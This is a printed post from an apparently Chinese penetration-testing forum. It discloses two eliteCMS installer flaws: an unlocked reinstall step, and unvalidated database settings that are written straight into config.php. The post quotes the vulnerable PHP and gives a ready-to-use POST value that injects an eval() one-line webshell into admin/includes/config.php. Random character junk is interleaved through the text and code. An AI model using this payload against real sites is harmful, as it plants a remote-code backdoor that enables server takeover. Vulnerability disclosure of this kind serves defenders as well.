中国网络渗透测试联盟

标题: eliteCMS安装文件未验证 + 一句话写入安全漏洞 [打印本页]

作者: admin    时间: 2012-11-18 13:59
标题: eliteCMS安装文件未验证 + 一句话写入安全漏洞
eliteCMS的安装程序安装结束后未作锁定,导致黑客可以通过访问安装程序地址进行重复安装
) ?/ ?+ g, G! f/ F( ~6 I
# Q. y# B/ e6 R另外一个漏洞是安装程序可以直接写入一句话到admin/includes/config.php
2 D  h: L9 H+ G2 M& B我们来看代码:4 T& L) v( B6 I2 R$ j) \
- H3 Y4 J8 _% u8 X  E
...1 s( b5 ?% H- }. p# }7 H0 V' V: |3 r
elseif ($_GET['step'] == "4") {
# g) Q/ S( i$ U    $file = "../admin/includes/config.php";) ]* W9 X: u6 g  [
    $write = "<?php\n";. O- k& m3 L0 e
    $write .= "/**\n";* {( ]5 y, k2 ~" ]/ V  h3 C
    $write .= "*\n";. {) Y8 v  P  @- G
    $write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
# B+ ?" J5 O2 t9 N/ A& d...略...# G  r; R  I& J0 L) {
    $write .= "*\n";
+ i% t7 \+ w4 e/ c- d# @! K    $write .= "*/\n";
& ]  d% B6 B  L+ d    $write .= "\n";
6 M  l* _/ P" I    $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";" m" @- k7 s2 ~7 \9 Q5 T9 \
    $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";  P5 ?  @- F0 ?8 w: h) e
    $write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";' W; _& R/ W$ r1 Y) y: y# d
    $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
3 e% @; s; V5 g    $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";
& Q2 ?" N$ Z3 `- b1 u6 L2 c  Z. s4 S    $write .= "if (!\$connection) {\n";) m- k! V+ J4 ^2 x
    $write .= "        die(\"Database connection failed\" .mysql_error());\n";1 H# A) |' l0 U& q; O' C
    $write .= "        \n";# M# B1 k. ^$ y
    $write .= "} \n";# Q1 a4 M( i. N+ ?
    $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";+ c' q% D( f. F- Z5 m+ z3 H
    $write .= "if (!\$db_select) {\n";  u; M- n% e; y; }( o1 T3 V$ O
    $write .= "        die(\"Database select failed\" .mysql_error());\n";/ J$ x4 J# ~; `% S4 k, [
    $write .= "        \n";
% H/ ]; K/ ~5 o1 h! Y    $write .= "} \n";
( `6 u. z5 E) d    $write .= "?>\n";, W6 G* O/ V. K4 {; E; k
6 n) c8 M" H% K' j. _
    $writer = fopen($file, 'w');" V4 {7 `0 [7 B; K' i1 e5 Y0 r
...
' ~3 X8 I  f( i* L+ a
1 g. r3 a7 c' p在看代码:* Q+ M3 y9 T9 J2 R+ {+ S

% g* |" q( D2 J9 |" y$ \% V3 _$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];5 U* {3 Z& m" r" }
$_SESSION['DB_NAME'] = $_POST['DB_NAME'];
: V% @7 D2 A' q5 u$_SESSION['DB_USER'] = $_POST['DB_USER'];! N1 n; K0 ?3 R7 [8 h/ Z
$_SESSION['DB_PASS'] = $_POST['DB_PASS'];
- E: Q* `; Z% m   }+ f" H  U# h8 t8 G
取值未作任何验证
5 W* Z) \* q$ c+ k' g" o如果将数据库名POST数据:
" f5 H* T+ `5 M' l * M/ M2 ]/ k% b. \5 g; r
"?><?php eval($_POST[c]);?><?php- v" v7 z2 z5 D+ T- ^* s, r

' P6 u4 W- F5 S% w将导致一句话后门写入/admin/includes/config.php# e2 P6 i3 p5 {& o; ]/ j. a2 J6 P* G3 @





欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2